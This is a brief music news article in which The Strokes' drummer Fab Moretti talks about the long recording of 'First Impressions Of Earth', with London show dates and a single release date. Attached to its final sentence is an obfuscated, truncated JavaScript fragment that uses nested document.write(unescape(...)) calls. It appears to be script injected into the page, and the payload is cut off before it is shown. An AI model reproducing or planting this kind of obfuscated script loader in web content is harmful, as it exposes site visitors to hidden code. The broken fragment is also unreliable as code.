The Strokes' drummer Fab Moretti says that the band can't wait to get their new album out after 12 months of recording.
The band are currently playing secret shows around the world previewing 'First Impressions Of Earth', which is out on January 2.
Moretti said to ninemsn of the long recording process: "It was fun, it was arduous, it was long. We really searched under every rock. Combed the desert, if you will, of music.
"We locked ourselves in for almost a year, came up with a bunch of things, recorded it, and now it's been so long I can't wait for it to get out. I can't live with this secret any more."
The Strokes play two intimate live shows in London on November 29 (at ULU) and December 2 (venue still to be announced).
'Juicebox', the first single from the new album, is released on December 5.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
